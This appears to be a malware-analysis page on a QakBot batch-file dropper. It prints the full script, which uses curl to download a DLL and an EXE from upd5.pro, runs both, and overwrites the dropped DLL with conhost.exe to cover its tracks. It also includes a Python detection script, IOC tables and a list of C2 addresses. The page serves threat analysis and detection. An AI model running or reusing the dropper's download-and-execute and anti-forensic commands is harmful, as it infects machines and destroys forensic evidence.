File Identity
| Field | Value |
|---|---|
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
| Format | Windows Batch Script (.bat) |
| Size | 326 bytes (minimal dropper) |
Cleartext Batch Script Content
```bat
echo "-> Loading update 2..."
curl -o 02.dll https://upd5.pro/update/02.dll
rundll32.exe 02.dll,checkit
echo "-> Loading update 2 tool..."
curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
qd_x86.exe
type c:\Windows\System32\conhost.exe > 02.dll
```
Analysis
| Step | Action |
|---|---|
| 1 | Download 02.dll from the C2 with curl |
| 2 | Run `rundll32.exe 02.dll,checkit`, invoking the DLL export checkit |
| 3 | Download qd_x86.exe with curl and execute it |
| 4 | Anti-forensics: `type conhost.exe > 02.dll` overwrites the dropped DLL with a legitimate Windows file, so the artifact left on disk is a copy of conhost.exe rather than the payload! |
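Added example, not part of the original analysis: a small Python triage script that reads the dropper one command per line and links the curl download, the rundll32 export call, the execution of the dropped EXE and the overwrite of the dropped DLL with a System32 binary into one chain. The sample input is the script above split per command; the regexes and the verdict labels are my own assumptions, not a vendor signature.

```python
import re

# Constructed sample: the dropper from this page, one command per line
SAMPLE_BAT = """\
echo "-> Loading update 2..."
curl -o 02.dll https://upd5.pro/update/02.dll
rundll32.exe 02.dll,checkit
echo "-> Loading update 2 tool..."
curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
qd_x86.exe
type c:\\Windows\\System32\\conhost.exe > 02.dll
"""

# curl -o <file> <url>
DOWNLOAD_RE = re.compile(r"\bcurl\b.*?-o\s+(\S+)\s+(https?://\S+)", re.I)
# rundll32[.exe] <dll>,<export>
RUNDLL_RE = re.compile(r"\brundll32(?:\.exe)?\s+(\S+?),(\w+)", re.I)
# type <system32 binary> > <file>  (overwrite a dropped file with a real one)
OVERWRITE_RE = re.compile(r"\btype\s+(\S*\\windows\\system32\\\S+)\s*>\s*(\S+)", re.I)

def analyze_batch(text):
    """Return (line_no, kind, file, detail) findings for download/exec/overwrite."""
    findings = []
    dropped = {}  # lowercase filename -> URL it was fetched from
    for n, line in enumerate(text.splitlines(), 1):
        if m := DOWNLOAD_RE.search(line):
            dropped[m.group(1).lower()] = m.group(2)
            findings.append((n, "download", m.group(1), m.group(2)))
        elif m := RUNDLL_RE.search(line):
            if m.group(1).lower() in dropped:  # only flag DLLs this script fetched
                findings.append((n, "exec_dropped_dll", m.group(1), m.group(2)))
        elif m := OVERWRITE_RE.search(line):
            if m.group(2).lower() in dropped:  # dropped payload replaced by a system file
                findings.append((n, "overwrite_dropped", m.group(2), m.group(1)))
        else:
            stem = line.strip().lower()
            if stem in dropped:  # bare invocation of a file this script downloaded
                findings.append((n, "exec_dropped_exe", stem, dropped[stem]))
    return findings

def verdict(findings):
    """Collapse the findings into a chain-level label (labels are assumptions)."""
    kinds = {f[1] for f in findings}
    if {"download", "exec_dropped_dll", "overwrite_dropped"} <= kinds:
        return "dropper with anti-forensic overwrite"
    if "download" in kinds and kinds & {"exec_dropped_dll", "exec_dropped_exe"}:
        return "download-and-execute"
    return "no chain"

if __name__ == "__main__":
    for f in analyze_batch(SAMPLE_BAT):
        print(f)
    print(verdict(analyze_batch(SAMPLE_BAT)))
```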
C2 Server
C2 Domain: upd5.pro
Payload 1: https://upd5.pro/update/02.dll (Qakbot DLL, export: checkit)
Payload 2: https://upd5.pro/update/qd_x86.exe (second-stage PE)
About Qakbot
Qakbot (Qbot) is a banking botnet family that first appeared in 2007 and whose infrastructure was taken down by the FBI's "Operation Duck Hunt" in 2023. It has been widely used as an initial access provider for ransomware operations (Conti, ProLock, Egregor) and has a history of working with Black Basta and REvil. It was observed becoming active again in 2024.
IOC
| Indicator | Value |
|---|---|
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
| C2 Domain | upd5.pro |
| DLL URL | https://upd5.pro/update/02.dll (export: checkit) |
| EXE URL | https://upd5.pro/update/qd_x86.exe |
| Anti-Forensics | Dropped DLL overwritten with conhost.exe |
QakBot — Malware Profile
QakBot (Quakbot) banker. Notesvb.msi delivery. Named pipe IPC. Modular architecture.
Technical Details
QakBot (Qbot/QuakBot) is a banking trojan and loader active since 2007. Features: credential theft, email hijacking for thread hijacking attacks, lateral movement via SMB/psexec, web injection for banking fraud. Delivered via malspam using hijacked email threads (reply-chain attacks). Modules: email collector, credential grabber, network scanner, VNC plugin. Used to deliver Egregor, ProLock, REvil, Black Basta ransomware. FBI "Operation Duck Hunt" disrupted infrastructure August 2023, removing QakBot from 700,000+ infected machines. Attempted comeback Q4 2023 with new delivery methods.
Attribution / Threat Actor
Gold Lagoon, TA570 (Shatak)
IOC List (1 indicator)
| Type | Value | Note |
|---|---|---|
| sha256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d | |
C2 Servers (8 recorded servers for this family)
| Address | Type | Port | Protocol | Status | Country |
|---|---|---|---|---|---|
| 95.217.35.154 | ip | 443 | HTTPS | inactive | FI |
| upd5.pro | domain | 443 | HTTPS | inactive | — |
| upd5.pro | domain | 443 | HTTPS | inactive | — |
| metasta.me | domain | 443 | HTTPS | inactive | — |
| upd5.pro | domain | 443 | HTTPS | inactive | — |
| amacey.com | domain | 443 | HTTPS | inactive | — |
| 181.174.165.208 | ip | 443 | HTTPS | sinkholed | AR |
| 212.117.180.232 | ip | 443 | HTTPS | sinkholed | CH |
C2 addresses are provided only from malware samples manually verified by the KEYDAL team. Commercial use is prohibited.